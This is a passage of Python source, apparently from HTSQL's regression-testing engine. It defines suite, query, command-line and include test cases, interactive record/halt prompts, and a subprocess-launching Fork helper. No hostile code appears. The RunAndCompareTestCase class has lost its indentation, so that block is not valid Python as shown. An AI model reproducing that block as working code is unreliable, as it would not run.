        Returns `DO_HALT` or `DO_CONTINUE`.
        """
        line = self.ask("Press ENTER to halt,"
                        " 'c'+ENTER to continue", ['', 'c'])
        if line == '':
            return DO_HALT
        if line == 'c':
            return DO_CONTINUE

    def ask_record(self):
        """
        Ask if the user wants to remember the new output of a test case.
        Returns `DO_RECORD`, `DO_SKIP`, or `DO_HALT`.
        """
        line = self.ask("Press ENTER to record,"
                        " 's'+ENTER to skip,"
                        " 'h'+ENTER to halt", ['', 's', 'h'])
        if line == '':
            return DO_RECORD
        if line == 's':
            return DO_SKIP
        if line == 'h':
            return DO_HALT

    def ask_save(self):
        """
        Ask if the user wants to save the updated output data.
        Returns `DO_SAVE` or `DO_DISCARD`.
        """
        line = self.ask("Press ENTER to save changes,"
                        " 'd'+ENTER to discard changes", ['', 'd'])
        if line == '':
            return DO_SAVE
        if line == 'd':
            return DO_DISCARD

    def out_exception(self, exc_info):
        """
        Prints an exception traceback.
        """
        # Obey the quiet mode: redirect to `quiet_buffer` if necessary.
        if self.is_quiet:
            file = self.quiet_buffer
        else:
            file = self.routine.ctl.stdout
        exc_type, exc_value, exc_traceback = exc_info
        traceback.print_exception(exc_type, exc_value, exc_traceback,
                                  file=file)

    def out_sep(self, sep="-", length=72):
        """
        Prints a separator: a long line of dashes.
        """
        self.out(sep*length)

    def out_header(self):
        """
        Prints a nice header describing the test case.
        """
        # Print:
        #   ---------------- ... -
        #     {NAME} {value}
        #     ({input.location})
        # where {value} is the value of the first field of the input data.
        self.out_sep()
        if not self.input.fields or self.input.fields[0].is_any:
            return
        attribute = self.input.fields[0].attribute
        value = getattr(self.input, attribute)
        if value is not None:
            if isinstance(value, list):
                value = " ".join(str(item) for item in value)
            self.out("%s %s" % (self.name.upper(), value), indent=2)
        if self.input.location is not None:
            self.out("(%s)" % self.input.location, indent=2)

    def halted(self, message=None):
        """
        Indicate that the test case failed and stop the tests.
        """
        self.force_out()
        if message is not None:
            self.out(message)
        self.state.failed += 1
        self.state.is_exiting = True

    def failed(self, message=None):
        """
        Indicate that the test case failed; stop the tests unless
        ``--force`` or ``--train`` flags are set.
        """
        self.force_out()
        if message is not None:
            self.out(message)
        self.state.failed += 1
        if not (self.routine.force or self.routine.train):
            self.state.is_exiting = True

    def updated(self, message=None):
        """
        Indicate that the output of the test case has been updated.
        """
        self.force_out()
        if message is not None:
            self.out(message)
        self.state.updated += 1

    def passed(self, message=None):
        """
        Indicate that the test case passed.
        """
        if message is not None:
            self.out(message)
        self.state.passed += 1

    def force_out(self):
        # Leave the quiet mode; flush the content of `quiet_buffer`
        # to the standard output stream.
        if not self.is_quiet:
            return
        self.is_quiet = False
        buffer = self.quiet_buffer.getvalue()
        self.routine.ctl.stdout.write(buffer)
        self.routine.ctl.stdout.flush()

    def verify(self):
        """
        Executes the test case.

        This method runs the test case with the given input data.
        If the test completed without errors, compare the produced
        output with the given expected output.

        The test case fails if

        - the test failed to complete without errors;
        - or the expected test output is not provided;
        - or the expected test output is not equal to the actual test output.

        Some test cases may not generate output; in this case the test
        passes if it is completed without errors.
        """
        # Override when subclassing.
        raise ScriptError("test %r is not implemented" % self.name)

    def train(self):
        """
        Executes the test case in the training mode; returns the output data.

        In the train mode, when the expected test output is not equal to the
        actual test output, the user is given a choice to update the expected
        test output.

        Note that when the output has not been changed or the user refused
        to update it, the method must return the original output data,
        ``self.output``.
        """
        # Override when subclassing if the test case requires test output data.
        # Otherwise, just run the test case in the normal mode.
        self.verify()
        return None
class SkipTestCase(TestCase):
    """
    Implements a skippable test case.

    This is an abstract mixin class; subclasses should call :meth:`skipped`
    to check whether the test case is enabled.
    """

    class Input(TestData):
        fields = [
            Field('skip', BoolVal(), False,
                  hint="""do not run the test"""),
            Field('ifdef', SeqVal(StrVal()), None,
                  hint="""run only if a given toggle is active"""),
            Field('ifndef', SeqVal(StrVal()), None,
                  hint="""run only if a given toggle is inactive"""),
        ]

    def skipped(self):
        """
        Checks whether this test case is currently disabled.
        """
        # Unconditional skip flag.
        if self.input.skip:
            return True
        # Positive guard: at least one of the listed toggles must be active.
        if (self.input.ifdef is not None
                and not (self.state.toggles & set(self.input.ifdef))):
            return True
        # Negative guard: none of the listed toggles may be active.
        if (self.input.ifndef is not None
                and self.state.toggles & set(self.input.ifndef)):
            return True
        return False
class DefineTestCase(SkipTestCase):
    """
    Activates a named toggle.
    """

    name = "define"
    hint = """activate a toggle"""
    help = """
    This test case activates a toggle variable. A toggle allows one
    to conditionally enable or disable some test cases using `ifdef`
    and `ifndef` directives.
    """

    class Input(TestData):
        fields = [
            Field('define', SeqVal(StrVal()),
                  hint="""activate the given toggles"""),
        ] + SkipTestCase.Input.fields

    def verify(self):
        # Nothing to do when the test case is disabled.
        if self.skipped():
            return
        # Register every requested toggle on the shared testing state.
        self.state.toggles.update(self.input.define)
class RunAndCompareTestCase(SkipTestCase):
"""
Implements common methods for a broad category of test cases.
This class implements common scenario: run the test, get the output
and compare it with the expected output.
This is an abstract class; create a subclass to implement a concrete
test case. The following methods has to be overridden: :meth:`execute`,
:meth:`render` and :meth:`differs`.
"""
def out_lines(self, lines, indent=0):
"""
Prints the lines with the specified identation.
"""
for line in lines:
# If `line` is UTF-8 encoded, print it literally;
# otherwise, replace special and non-ASCII characters
# with dots.
try:
line.decode('utf-8')
except UnicodeDecodeError:
line = re.sub(r'[\x00-\x1F\x7E-\xFF]', '.', line)
self.out(line.rstrip(), indent=indent)
def out_diff(self, old_output, new_output):
"""
Prints the delta between two test outputs.
"""
# Sanity check on the arguments.
assert isinstance(old_output, maybe(self.Output))
assert isinstance(new_output, self.Output)
# Render the outputs to the lists of lines.
old_lines = self.render(old_output)
new_lines = self.render(new_output)
# This function is supposed to be called in two cases:
# when there is no expected output, but only the actual output,
# and when the expected output differs from the actual output.
# However it may also happen that the function is called with
# two identical outputs, or that the `render` method hides
# the difference.
if old_lines is None:
self.out("=== the test output is new")
elif old_lines != new_lines:
self.out("=== the test output is changed")
else:
self.out("=== the test output is not changed")
self.out()
# Display the actual output if there is no expected output;
# otherwise display the delta between the expected and the actual
# output in the unified diff format.
if old_lines is None or old_lines == new_lines:
lines = new_lines
else:
diff = difflib.unified_diff(old_lines, new_lines,
n=2, lineterm='')
# Strip the leading `---` and `+++` lines of the unified diff.
lines = list(diff)[2:]
self.out_lines(lines, indent=2)
def render(self, output):
"""
Converts the output data to a list of lines.
"""
# Override when subclassing.
raise NotImplementedError()
def execute(self):
"""
Runs the test case; returns the produced output.
Returns ``None`` if an error occured when running the test case.
"""
# Override when subclassing.
raise NotImplementedError()
def differs(self, old_output, new_output):
"""
Checks if the actual test output differs from the expected test output.
"""
# Override when subclassing.
raise NotImplementedError()
def verify(self):
# Check if the test is skipped.
if self.skipped():
return
# Display the header.
self.out_header()
# When no expected test output, fail without executing the test.
if self.output is None:
return self.failed("*** no output data found")
# Execute the test; get the actual test output.
new_output = self.execute()
# `None` indicates that an error occurred; `execute()` is responsible
# for displaying an error message, so we just update the status and
# exit.
if new_output is None:
return self.failed()
# Compare the expected and the actual outputs, fail if they are
# different.
if self.differs(self.output, new_output):
self.out_diff(self.output, new_output)
return self.failed("*** unexpected test output")
# The actual output coincides with the expected output; we are good.
return self.passed()
    def train(self):
        """
        Runs the test case in training mode: executes the test and, when
        the output changed, interactively asks the user whether to record
        the new output.  Returns the output record the caller should keep
        (the caller checks ``case.train() is case.output`` to learn if the
        output is updated).
        """
        # Check if the test is skipped.
        if self.skipped():
            return self.output
        # Display the header.
        self.out_header()
        # Execute the test; get the actual test output.
        new_output = self.execute()
        # We need to handle three possible outcomes: an error occurred
        # when running the test, the expected output differs from the
        # actual output and the expected output coincides with the actual
        # output.
        # An error occurred while running the test.
        if new_output is None:
            # Ask the user if they want to stop the testing; the expected
            # output is not updated.
            reply = self.ask_halt()
            if reply is DO_HALT:
                self.halted("*** halting")
            else:
                self.failed()
            return self.output
        # The actual output differs from the expected output.
        if self.differs(self.output, new_output):
            # Display the difference.
            self.out_diff(self.output, new_output)
            # Ask the user if they want to record the new output,
            # keep the old output, or halt the testing.
            reply = self.ask_record()
            if reply is DO_HALT:
                self.halted("*** halting")
                return self.output
            if reply is DO_RECORD:
                if self.output is None:
                    self.updated("*** recording new test output")
                else:
                    self.updated("*** recording updated test output")
                return new_output
            self.failed()
            return self.output
        # The actual output coincides with the expected output; note that
        # the caller checks if ``case.train() is case.output`` to learn
        # if the output is updated.
        self.passed()
        return self.output
class AppTestCase(SkipTestCase):
    """
    Configures the HTSQL application.
    """
    name = "app"
    hint = """configure the HTSQL application"""
    help = """
    To run HTSQL requests, the testing engine needs to create an HTSQL
    application. This test case allows you to configure the application
    parameters.
    """
    class Input(TestData):
        # The input record: connection URI, extra extensions and an
        # optional name under which to save the configuration.
        fields = [
                Field('db', DBVal(is_nullable=True),
                      hint="""the connection URI"""),
                Field('extensions', MapVal(StrVal(),
                                           MapVal(StrVal(), AnyVal())),
                      default={},
                      hint="""include extra extensions"""),
                Field('save', StrVal(), default=None,
                      hint="""name of the configuration""")
        ] + SkipTestCase.Input.fields
    def out_header(self):
        """
        Prints the test case header.
        """
        # Overridden to avoid printing the password to the database.
        # Clone `input.db`, but omit the password.
        db = self.input.db
        if db is not None:
            sanitized_db = DB(engine=db.engine,
                              username=db.username,
                              password=None,
                              host=db.host,
                              port=db.port,
                              database=db.database,
                              options=db.options)
        else:
            sanitized_db = "-"
        # Print:
        #   ---------------- ... -
        #   APP {sanitized_db}
        #   ({input.location})
        self.out_sep()
        self.out("%s %s" % (self.name.upper(), sanitized_db), indent=2)
        if self.input.location is not None:
            self.out("(%s)" % self.input.location, indent=2)
    def verify(self):
        """
        Creates the HTSQL application and stores it in the testing state.
        """
        # Check if the test is skipped.
        if self.skipped():
            return
        # Display the header.
        self.out_header()
        # Create an application and update the testing state. The created
        # application will be in effect for the subsequent tests in the
        # current suite and all the nested suites unless overridden.
        from htsql import HTSQL
        self.state.app = None
        try:
            self.state.app = HTSQL(self.input.db,
                                   self.input.extensions)
        except Exception:
            self.out_exception(sys.exc_info())
            return self.failed("*** an exception occured while"
                               " initializing an HTSQL application")
        # Record the configuration.
        if self.input.save is not None:
            self.state.saves[self.input.save] = (self.input.db,
                                                 self.input.extensions)
        return self.passed()
class LoadAppTestCase(SkipTestCase):
    """
    Loads an existing configuration of an HTSQL application.
    """
    name = "load-app"
    hint = """activate an existing HTSQL application"""
    help = """
    This test case loads a previously saved application configuration.
    """
    class Input(TestData):
        # The input record: the name of a previously saved configuration,
        # extra extensions to add, and an optional name to save under.
        fields = [
                Field('load', StrVal(),
                      hint="""name of the configuration"""),
                Field('extensions', MapVal(StrVal(),
                                           MapVal(StrVal(), AnyVal())),
                      default={},
                      hint="""include extra extensions"""),
                Field('save', StrVal(), default=None,
                      hint="""name of the new configuration""")
        ] + SkipTestCase.Input.fields
    def verify(self):
        """
        Recreates an HTSQL application from a saved configuration and
        stores it in the testing state.
        """
        # Check if the test is skipped.
        if self.skipped():
            return
        # Display the header.
        self.out_header()
        # Find the configuration data; complain if not found.
        if self.input.load not in self.state.saves:
            return self.failed("*** unknown configuration name %s"
                               % self.input.load)
        configuration = self.state.saves[self.input.load]
        # Add new extensions.
        configuration = configuration+(self.input.extensions,)
        # Create an application and update the testing state.
        from htsql import HTSQL
        self.state.app = None
        try:
            self.state.app = HTSQL(*configuration)
        except Exception:
            self.out_exception(sys.exc_info())
            return self.failed("*** an exception occured while"
                               " initializing an HTSQL application")
        # Record the new configuration.
        if self.input.save is not None:
            self.state.saves[self.input.save] = configuration
        return self.passed()
class IncludeTestCase(SkipTestCase):
    """
    Loads input test data from a file.
    """
    name = "include"
    hint = """load input data from a file"""
    help = """
    This test case allows you to execute a test case or a test suite defined
    in a separate file.
    """
    class Input(TestData):
        fields = [
                Field('include', StrVal(),
                      hint="""file containing input test data"""),
        ] + SkipTestCase.Input.fields
    class Output(TestData):
        fields = [
                Field('include', StrVal(),
                      hint="""file containing input test data"""),
                Field('output', ClassVal(TestData),
                      hint="""the corresponding output test data"""),
        ]
    def __init__(self, routine, state, input, output):
        super(IncludeTestCase, self).__init__(routine, state, input, output)
        # Load the input data and create the corresponding test case.
        self.included_input = routine.load_input(self.input.include)
        case_class = self.included_input.case_class
        # Reuse the stored output only when it matches the included input;
        # otherwise the nested case starts without expected output.
        self.included_output = None
        if self.output is not None:
            if case_class.matches(self.included_input, self.output.output):
                self.included_output = self.output.output
        self.case = case_class(routine, state,
                               self.included_input,
                               self.included_output)
    def get_suites(self):
        """
        Returns the set of ids of the nested suites.
        """
        # Get the set of nested suites.
        return self.case.get_suites()
    def verify(self):
        """
        Runs the included test case in verification mode.
        """
        # Check if the test is skipped.
        if self.skipped():
            return
        # Run the included test.
        self.case.verify()
    def train(self):
        """
        Runs the included test case in training mode; returns the
        (possibly updated) wrapping output record.
        """
        # Check if the test is skipped.
        if self.skipped():
            return self.output
        # Run the included test; get the output.
        new_output = self.case.train()
        # Three outcomes are possible: the test generated no output, in this
        # case we don't need to create an output record either; the test
        # generated new or updated output, we have to update our output as
        # well; and finally, the test output didn't change, we could keep
        # ours too.
        if new_output is None:
            output = None
        elif new_output is not self.included_output:
            output = self.make_output(include=self.input.include,
                                      output=new_output)
        else:
            output = self.output
        return output
class SuiteTestCase(SkipTestCase):
    """
    Implements a container of test cases.
    """
    name = "suite"
    hint = """contains other test cases"""
    help = """
    A test suite is a container of test cases. Typically, it is the
    top-level test case in a test file.
    The testing engine allows you to specify what suites to run by their
    ids.
    """
    class Input(TestData):
        fields = [
                Field('title', StrVal(),
                      hint="""the description of the suite"""),
                Field('id', StrVal(), None,
                      hint="""the code name of the suite"""),
                Field('output', StrVal(), None,
                      hint="""file to save the output of the tests"""),
                Field('tests', SeqVal(ClassVal(TestData)),
                      hint="""a list of test inputs"""),
        ] + SkipTestCase.Input.fields
        def init_attributes(self):
            # When `id` is not specified, generate it from the title.
            if self.id is None:
                self.id = self.title.lower().replace(' ', '-')
    class Output(TestData):
        fields = [
                Field('id', StrVal(),
                      hint="""the code name of the suite"""),
                Field('tests', SeqVal(ClassVal(TestData)),
                      hint="""a list of test outputs"""),
        ]
    def __init__(self, routine, state, input, output):
        super(SuiteTestCase, self).__init__(routine, state, input, output)
        # A test suite has an ability to save its test output to a separate
        # file. In this case, `self.ext_output` contains the test data
        # loaded from the file.
        self.ext_output = None
        if input.output is not None and os.path.exists(input.output):
            ext_output = routine.load_output(input.output)
            if self.matches(input, ext_output):
                self.ext_output = ext_output
        # Generate a list of test cases.
        self.cases = []
        # The nested cases run with their own state; it is synchronized
        # with the suite state in `verify()` and `train()` via push/pull.
        self.cases_state = TestState()
        self.init_cases()
    def init_cases(self):
        """
        Pairs input records with matching output records and instantiates
        the nested test cases.
        """
        # Generate a list of test cases. We have two independent lists:
        # one containing input test records and the other containing
        # output test records. Our goal is to find matching pairs and
        # generate the corresponding test cases.
        # The matching pairs of input and output data.
        pairs = []
        # List of available output records. We need to copy it since
        # it is going to be modified.
        available_outputs = []
        if self.ext_output is not None:
            available_outputs = self.ext_output.tests[:]
        elif self.output is not None:
            available_outputs = self.output.tests[:]
        # For each input record, find the matching output record.
        for input in self.input.tests:
            case_class = input.case_class
            for idx, output in enumerate(available_outputs):
                if case_class.matches(input, output):
                    pairs.append((input, output))
                    # Each output record may be claimed by only one input.
                    del available_outputs[idx]
                    break
            else:
                pairs.append((input, None))
        # Initialize the test cases.
        for input, output in pairs:
            case_class = input.case_class
            case = case_class(self.routine, self.cases_state, input, output)
            self.cases.append(case)
    def get_suites(self):
        """
        Returns the set of ids of this and all the nested suites.
        """
        # Get a set of (this and) the nested suites.
        suites = set([self.input.id])
        for case in self.cases:
            suites |= case.get_suites()
        return suites
    def out_header(self):
        """
        Prints the suite header.
        """
        # Print the header:
        #   ================ ... =
        #   {input.title}
        #   ({input.location})
        self.out_sep("=")
        self.out(self.input.title, indent=2)
        if self.input.location is not None:
            self.out("(%s)" % self.input.location, indent=2)
    def skipped(self):
        """
        Checks if the suite should not be executed.
        """
        # Check if the suite should not be executed.
        # Check if the test case was explicitly disabled.
        if super(SuiteTestCase, self).skipped():
            return True
        # The suite is skipped when:
        # - the user specified an explicit list of the suites to run;
        # - and the suite is not one of them;
        # - and the suite does not contain any selected nested suite;
        # - and the suite is not nested in some selected suite.
        if not self.routine.suites:
            return False
        if self.state.with_all_suites:
            return False
        if self.input.id in self.routine.suites:
            # Selecting a suite implicitly selects everything nested in it.
            self.cases_state.with_all_suites = True
            return False
        if self.get_suites() & set(self.routine.suites):
            return False
        return True
    def verify(self):
        """
        Runs all the nested test cases in verification mode.
        """
        # Run the suite.
        # Push the current state to the cases state.
        self.state.push(self.cases_state)
        # Check if the suite is disabled or if the user specified
        # the suites to run and this one is not among them.
        if self.skipped():
            return
        # Display the headers.
        self.out_header()
        # Run the nested test cases.
        for case in self.cases:
            case.verify()
            # Check if the user asked to halt the testing.
            if self.cases_state.is_exiting:
                break
        # Pull the statistical information from the cases state.
        self.state.pull(self.cases_state)
    def train(self):
        """
        Runs all the nested test cases in training mode; returns the
        (possibly updated) suite output record, or ``None`` when the
        output was saved to a separate file.
        """
        # Run the suite; update the test output if necessary.
        # Push the current state to the cases state.
        self.state.push(self.cases_state)
        # Check if the suite is disabled or if the user specified
        # the suites to run and this one is not among them.
        if self.skipped():
            return self.output
        # A dictionary containing the output (or `None`) generated by test
        # cases when it differs from the existing test output.
        new_output_by_case = {}
        # Display the header.
        self.out_header()
        # Run the nested tests.
        for case in self.cases:
            new_output = case.train()
            # Record modified output data.
            if new_output is not case.output:
                new_output_by_case[case] = new_output
            # Check if the user asked to halt the testing.
            if self.cases_state.is_exiting:
                break
        # Pull the statistical information from the cases state.
        self.state.pull(self.cases_state)
        # Generate a new output record.
        output = self.make_output(new_output_by_case)
        # The output is kept in a separate file.
        if self.input.output is not None:
            # If the output has been updated, ask the user if they want
            # to save it.
            if output is not self.ext_output:
                self.out_sep()
                reply = self.ask_save()
                if reply is DO_DISCARD:
                    # `self.output` may still be not ``None`` if the `output`
                    # field was recently added. In that case, we don't want
                    # to delete the regular output data until it is saved
                    # to a separate file.
                    return self.output
                self.out("*** saving test output data to %r"
                         % self.input.output)
                self.routine.save_output(self.input.output, output)
            # Returning `None` since the output is saved to a separate file.
            return None
        return output
    def make_output(self, new_output_by_case):
        """
        Merges the updated per-case outputs into the suite output record;
        returns the existing record unchanged when nothing differs.
        """
        # Generate the output test data.
        # Here we update the list of output test records. Note that the list
        # may contain some inactive output records. These output records
        # do not correspond to any input records and thus have no respective
        # test case. It may happen if the user removed or modified the input
        # data. Since a test case may be only temporarily disabled, we never
        # remove inactive output records unless the `--purge` option is enabled.
        # The list of the output records.
        tests = []
        # Start with the original list of output records.
        if self.output is not None:
            tests = self.output.tests[:]
        if self.ext_output is not None:
            tests = self.ext_output.tests[:]
        # `--purge` is enabled, we don't have to keep inactive records,
        # so simply generate the list from scratch.
        if self.routine.purge and not self.state.is_exiting:
            tests = []
            for case in self.cases:
                output = case.output
                if case in new_output_by_case:
                    output = new_output_by_case[case]
                if output is not None:
                    tests.append(output)
        # Some test cases generated new output, so we need to update the list.
        elif new_output_by_case:
            # Here we take the original list of records and replace those
            # that have been updated. We may also encounter a new output
            # record, which has no corresponding old record in the list.
            # For that new record, we need to find a position in the list.
            # We want the order of the output records to match the order
            # of their respective input records, so to ensure this, we
            # put any new record immediately after all other records processed
            # so far.
            # Position to put new records.
            next_idx = 0
            for case in self.cases:
                # The record has been added, removed or updated.
                if case in new_output_by_case:
                    new_output = new_output_by_case[case]
                    # The record is rarely entirely removed so we should almost
                    # never get ``None`` here. If we do, do nothing.
                    if new_output is not None:
                        # This is an updated record: replace the old record
                        # and update the position for the following new
                        # records.
                        if case.output in tests:
                            idx = tests.index(case.output)
                            tests[idx] = new_output
                            if idx >= next_idx:
                                next_idx = idx+1
                        # This is a new record: place it to the designated
                        # position.
                        else:
                            tests.insert(next_idx, new_output)
                            next_idx += 1
                # The record has not been changed.
                else:
                    # Make sure any new record will go after this one.
                    if case.output in tests:
                        idx = tests.index(case.output)
                        if idx >= next_idx:
                            next_idx = idx+1
        # When there are no test output data, skip creating the output record.
        if not tests:
            return None
        # Now we need to check if the new output list coincides with the old
        # one, in which case we don't want to create a new output record.
        if self.input.output is not None:
            if self.ext_output is not None and self.ext_output.tests == tests:
                return self.ext_output
        else:
            if self.output is not None and self.output.tests == tests:
                return self.output
        # Generate and return new output data.
        output = super(SuiteTestCase, self).make_output(id=self.input.id,
                                                        tests=tests)
        return output
class QueryTestCase(RunAndCompareTestCase):
    """
    Performs an HTSQL query.
    """
    name = "query"
    hint = """execute an HTSQL query"""
    help = """
    This test case executes an HTSQL query.
    """
    class Input(TestData):
        fields = [
                Field('uri', StrVal(),
                      hint="""the HTSQL query"""),
                Field('method', ChoiceVal(['GET', 'POST']), 'GET',
                      hint="""the HTTP method (GET or POST)"""),
                Field('remote_user', StrVal(), None,
                      hint="""the HTTP remote user"""),
                Field('headers', MapVal(StrVal(), StrVal()), None,
                      hint="""the HTTP headers"""),
                Field('content_type', StrVal(), None,
                      hint="""the content type of HTTP POST data"""),
                Field('content_body', StrVal(), None,
                      hint="""the HTTP POST data"""),
                Field('expect', IntVal(), 200,
                      hint="""the HTTP status code to expect"""),
                Field('ignore', BoolVal(), False,
                      hint="""ignore the response body"""),
                Field('ignore_headers', BoolVal(), False,
                      hint="""ignore the response headers"""),
        ] + SkipTestCase.Input.fields
        def init_attributes(self):
            # Check that `content-type` and `content-body` are set only if
            # the HTTP method is `POST`.
            if self.method == 'GET':
                if self.content_type is not None:
                    raise ValueError("unexpected content-type parameter"
                                     " for a GET request")
                if self.content_body is not None:
                    raise ValueError("unexpected content-body parameter"
                                     " for a GET request")
            if self.method == 'POST':
                if self.content_body is None:
                    raise ValueError("no expected content-body parameter"
                                     " for a POST request")
    class Output(TestData):
        fields = [
                Field('uri', StrVal(),
                      hint="""the HTSQL query"""),
                Field('status', StrVal(),
                      hint="""the response status line"""),
                Field('headers', SeqVal(SeqVal(StrVal(), length=2)),
                      hint="""the response headers"""),
                Field('body', StrVal(),
                      hint="""the response body"""),
        ]
        def init_attributes(self):
            # Convert the list of two-element lists to a list of pairs.
            self.headers = [(key, value) for key, value in self.headers]
    def out_header(self):
        """
        Prints the test case header.
        """
        # Display the header:
        #   ---------------- ... -
        #   {method} {uri}
        #   ({input.location})
        #   Remote-User: {remote_user}
        #   {header}: value
        #   ...
        #   Content-Type: {content_type}
        #
        #   {content_body}
        self.out_sep()
        self.out("%s %s" % (self.input.method, self.input.uri), indent=2)
        self.out("(%s)" % self.input.location, indent=2)
        if self.input.remote_user is not None:
            self.out("Remote-User: %s" % self.input.remote_user, indent=2)
        if self.input.headers:
            for key in sorted(self.input.headers):
                value = self.input.headers[key]
                self.out("%s: %s" % (key, value), indent=2)
        if self.input.content_type is not None:
            self.out("Content-Type: %s" % self.input.content_type, indent=2)
            self.out()
        if self.input.content_body:
            self.out_lines(self.input.content_body.splitlines(), indent=2)
    def differs(self, old_output, new_output):
        """
        Checks if the actual response differs from the expected response,
        honoring the `ignore` and `ignore_headers` flags.
        """
        # Check if the actual output differs from the expected output.
        if old_output is None or new_output is None:
            return True
        if old_output.status != new_output.status:
            return True
        if not self.input.ignore_headers:
            if old_output.headers != new_output.headers:
                return True
        if not self.input.ignore:
            if old_output.body != new_output.body:
                return True
        return False
    def render(self, output):
        """
        Converts the output record to a list of lines (status line,
        headers, blank separator, body).
        """
        # Convert the output record to a list of lines.
        if output is None:
            return None
        lines = []
        lines.append(output.status)
        for header, value in output.headers:
            lines.append("%s: %s" % (header, value))
        lines.append("")
        lines.extend(output.body.splitlines())
        return lines
    def execute(self):
        """
        Executes the query against the active HTSQL application; returns
        a new output record, or ``None`` on error.
        """
        # Execute the query; return the output.
        # Prepare the HTSQL application.
        app = self.state.app
        if app is None:
            return self.failed("*** no HTSQL application is defined")
        # Prepare and execute the query.
        request = Request.prepare(method=self.input.method,
                                  query=self.input.uri,
                                  remote_user=self.input.remote_user,
                                  content_type=self.input.content_type,
                                  content_body=self.input.content_body,
                                  extra_headers=self.input.headers)
        response = request.execute(app)
        # Check if the response is valid.
        # NOTE(review): `self.out(...)` presumably returns ``None``, which
        # is how an error is signalled to the caller here.
        if response.exc_info is not None:
            self.out_exception(response.exc_info)
            return self.out("*** an exception occured"
                            " while executing the query")
        if not response.complete():
            return self.out("*** the response is not complete")
        # Generate the output record.
        new_output = self.make_output(uri=self.input.uri,
                                      status=response.status,
                                      headers=response.headers,
                                      body=response.body)
        # Check if we get the expected status code (200, by default).
        # If not, display the response and discard the output.
        if not response.status.startswith(str(self.input.expect)):
            self.out_diff(self.output, new_output)
            return self.out("*** unexpected status code: %s"
                            % response.status)
        return new_output
class CtlTestCase(RunAndCompareTestCase):
    """
    Executes a script routine.
    """
    name = "ctl"
    hint = """execute a routine"""
    help = """
    This test case simulates a run of the HTSQL command-line application.
    """
    class Input(TestData):
        fields = [
                Field('ctl', SeqVal(StrVal()),
                      hint="""a list of command-line parameters"""),
                Field('stdin', StrVal(), '',
                      hint="""the content of the standard input"""),
                Field('expect', IntVal(), 0,
                      hint="""the exit code to expect"""),
                Field('ignore', BoolVal(), False,
                      hint="""ignore the exit code and the standard output"""),
        ] + SkipTestCase.Input.fields
    class Output(TestData):
        fields = [
                Field('ctl', SeqVal(StrVal()),
                      hint="""a list of command-line parameters"""),
                Field('stdout', StrVal(),
                      hint="""the content of the standard output"""),
                Field('exit', IntVal(),
                      hint="""the exit code"""),
        ]
    def out_header(self):
        """
        Prints the test case header.
        """
        # Display the header:
        #   ---------------- ... -
        #   {EXECUTABLE} {ctl}
        #   ({input.location})
        self.out_sep()
        executable = os.path.basename(self.routine.executable)
        command_line = " ".join([executable.upper()]+self.input.ctl)
        self.out(command_line, indent=2)
        self.out("(%s)" % self.input.location, indent=2)
    def differs(self, old_output, new_output):
        """
        Checks if the actual run differs from the expected run, honoring
        the `ignore` flag.
        """
        # Check if the actual output differs from the expected output.
        if old_output is None or new_output is None:
            return True
        if not self.input.ignore:
            if old_output.exit != new_output.exit:
                return True
            if old_output.stdout != new_output.stdout:
                return True
        return False
    def render(self, output):
        """
        Converts the output record to a list of lines.
        """
        # Convert the output to a list of lines.
        if output is None:
            return None
        return output.stdout.splitlines()
    def execute(self):
        """
        Runs the command-line application in-process with captured
        streams; returns a new output record, or ``None`` on error.
        """
        # Run the routine; return the output
        # Prepare the standard streams and the script instance.
        stdout = io.StringIO()
        # stderr is merged into stdout so the captured output matches
        # what a terminal user would see.
        stderr = stdout
        stdin = TermStringIO(self.input.stdin, stdout)
        command_line = [self.routine.executable]+self.input.ctl
        # The script class.
        ctl_class = self.routine.ctl.__class__
        # Initialize and execute the script; check for exceptions.
        try:
            ctl = ctl_class(stdin, stdout, stderr)
            exit = ctl.main(command_line)
        except:
            self.out_exception(sys.exc_info())
            return self.out("*** an exception occured"
                            " while running the application")
        # Normalize the exit code.
        if exit is None:
            exit = 0
        elif not isinstance(exit, int):
            # A non-integer exit value is treated as an error message.
            stderr.write(str(exit))
            exit = 1
        # Generate a new output record.
        new_output = self.make_output(ctl=self.input.ctl,
                                      stdout=stdout.getvalue(),
                                      exit=exit)
        # Check if we get the expected exit code; if not, display
        # the content of stdout and discard the output record.
        if not self.input.ignore:
            if new_output.exit != self.input.expect:
                self.out_diff(self.output, new_output)
                return self.out("*** unexpected exit code: %s" % exit)
        return new_output
class Fork(object):
    """
    Keeps information on the started processes.

    Class attributes:

    `active_forks`
        The global list of active processes.

    `is_atexit_registered`
        Indicates whether an :func:`atexit.atexit` callable was registered.
        The callable is called when the script is about to finish and kills
        any remaining active processes.

    Attributes:

    `process` (an instance of :class:`subprocess.Popen`)
        The wrapped process.

    `temp_path` (a string)
        A directory containing two files: `input` and `output`, which
        keeps the content of the standard input and the standard output
        respectively.
    """
    active_forks = []
    is_atexit_registered = False
    @classmethod
    def start(cls, executable, arguments, input):
        """
        Starts a new process.

        `executable`
            The path to the executable.

        `arguments`
            The list of arguments (not including the executable).

        `input`
            The content of the standard input (a string).

        Returns a new :class:`Fork` instance.
        """
        # Create a temporary directory with the files 'input' and 'output'.
        temp_path = tempfile.mkdtemp()
        # The input arrives as a text string, but the file is opened in
        # binary mode (it is handed directly to the child process); encode
        # it first -- writing `str` to a binary stream raises `TypeError`
        # on Python 3.
        if isinstance(input, str):
            input = input.encode('utf-8')
        with open("%s/input" % temp_path, 'wb') as stream:
            stream.write(input)
        # Prepare the standard input and the standard output streams.
        stdin = open("%s/input" % temp_path, 'rb')
        stdout = open("%s/output" % temp_path, 'wb')
        # Start the process; clean up the temporary directory on failure.
        try:
            try:
                process = subprocess.Popen([executable]+arguments,
                                           stdin=stdin,
                                           stdout=stdout,
                                           stderr=subprocess.STDOUT)
            finally:
                # The child gets duplicates of the descriptors; close our
                # copies so the file handles are not leaked.
                stdin.close()
                stdout.close()
        except:
            shutil.rmtree(temp_path)
            raise
        # Return a new `Fork` instance.
        return cls(process, temp_path)
    @classmethod
    def atexit(cls):
        """
        Finalizes any remaining active processes.
        """
        # Iterate over a copy: `end()` removes the fork from the list.
        for fork in cls.active_forks[:]:
            fork.end()
    @classmethod
    def atexit_register(cls):
        """
        Registers the `atexit` callable if not done already.
        """
        if not cls.is_atexit_registered:
            atexit.register(cls.atexit)
            cls.is_atexit_registered = True
    def __init__(self, process, temp_path):
        # Sanity check on the arguments.
        assert isinstance(process, subprocess.Popen)
        assert isinstance(temp_path, str) and os.path.isdir(temp_path)
        self.process = process
        self.temp_path = temp_path
        # Save themselves in the global list of active processes.
        self.active_forks.append(self)
        # Register the `atexit` callback.
        self.atexit_register()
    def end(self):
        """
        Ends the process.

